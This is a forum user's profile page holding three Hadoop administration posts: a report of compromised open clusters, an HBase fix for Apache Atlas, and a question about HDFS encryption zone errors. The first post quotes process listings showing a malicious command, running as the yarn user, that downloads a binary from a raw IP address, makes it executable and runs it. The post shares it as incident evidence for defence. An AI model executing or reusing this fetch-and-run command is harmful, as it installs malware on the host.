Member since 
    
	
		
		
		06-09-2014
	
	
	
	
	
	
	
	
	
	
	
	
	
	
			
      
                7
            
            
                Posts
            
        
                0
            
            
                Kudos Received
            
        
                0
            
            
                Solutions
            
        
			
    
	
		
		
		01-30-2019
	
		
		02:43 PM
	
	
	
	
	
	
	
	
	
	
	
	
	
	
		
	
				
		
			
					
				
		
	
		
					
							 
	I have encountered this issue by three different types on some of our open clusters.  
	1. Crontab - Already covered in the above post  
	2.Java process - Already covered in the above post  
	3. Yarn process - We have seen this issue here as a process which runs as yarn user and launches container.    #ps -elf
yarn      2239  2238  0 19:56 ?        00:00:00 /bin/bash -c wget http://178.128.173.178/bins/hoho.x86;chmod 777 *;./hoho.x86 Servers
yarn      2248  2239  0 19:56 ?        00:00:00 wget http://178.128.173.178/bins/hoho.x86
  
	Resolution: Make sure you have correct security groups. Do not open ports to World. 
						
					
					... View more
				
			
			
			
			
			
			
			
			
			
		
			
    
	
		
		
		08-29-2017
	
		
		03:03 PM
	
	
	
	
	
	
	
	
	
	
	
	
	
	
		
	
				
		
			
					
				
		
	
		
					
							 You have to login to HBase and remove master table atlas_titan as below  And restart service.  hbase(main):003:0> list  TABLE  ATLAS_ENTITY_AUDIT_EVENTS  atlas_titan  2 row(s) in 0.0070 seconds  => ["ATLAS_ENTITY_AUDIT_EVENTS", "atlas_titan"]  hbase(main):005:0> disable 'atlas_titan'  0 row(s) in 2.5060 seconds  hbase(main):006:0> drop 'atlas_titan'  0 row(s) in 1.2730 seconds  hbase(main):007:0> exit  Restart Atlas service from Ambari UI 
						
					
					... View more
				
			
			
			
			
			
			
			
			
			
		
			
    
	
		
		
		09-09-2015
	
		
		04:50 AM
	
	
	
	
	
	
	
	
	
	
	
	
	
	
		
	
				
		
			
					
				
		
	
		
					
							 CDH Version: CDH5.4.5    Issue: When HDFS Encryption is enabled using KMS available in Hadoop CDH 5.4 , getting error while putting file into encryption zone.    Steps:    Steps for Encryption of Hadoop as follows:        Creating a key [SUCCESS]        [tester@master ~]$ hadoop key create 'TDEHDP'      -provider kms://https@10.1.118.1/key_generator/kms -size 128      tde group has been successfully created with options      Options{cipher='AES/CTR/NoPadding', bitLength=128, description='null', attributes=null}.      KMSClientProvider[https://10.1.118.1/key_generator/kms/v1/] has been updated.    2.Creating a directory [SUCCESS]    [tester@master ~]$ hdfs dfs -mkdir /user/tester/vs_key_testdir        Adding Encryption Zone [SUCCESS]        [tester@master ~]$ hdfs crypto -createZone -keyName 'TDEHDP'      -path /user/tester/vs_key_testdir      Added encryption zone /user/tester/vs_key_testdir        Copying File to encryption Zone [ERROR]        [tdetester@master ~]$ hdfs dfs -copyFromLocal test.txt /user/tester/vs_key_testdir        15/09/04 06:06:33 ERROR hdfs.KeyProviderCache: Could not find uri with key [dfs.encryption.key.provider.uri] to create a keyProvider !! copyFromLocal: No KeyProvider is configured, cannot access an encrypted file 15/09/04 06:06:33 ERROR hdfs.DFSClient: Failed to close inode 20823 org.apache.hadoop.ipc.RemoteException(org.apache.hadoop.hdfs.server.namenode.LeaseExpiredException): No lease on /user/tester/vs_key_testdir/test.txt.COPYING (inode 20823): File does not exist. Holder DFSClient_NONMAPREDUCE_1061684229_1 does not have any open files.    Any idea/suggestion will be helpful. 
						
					
					... View more
				
			
			
			
			
			
			
			
			
			
		
		
			
				
						
							Labels:
						
						
		
	
					
			
		
	
	
	
	
				
		
	
	
 
        




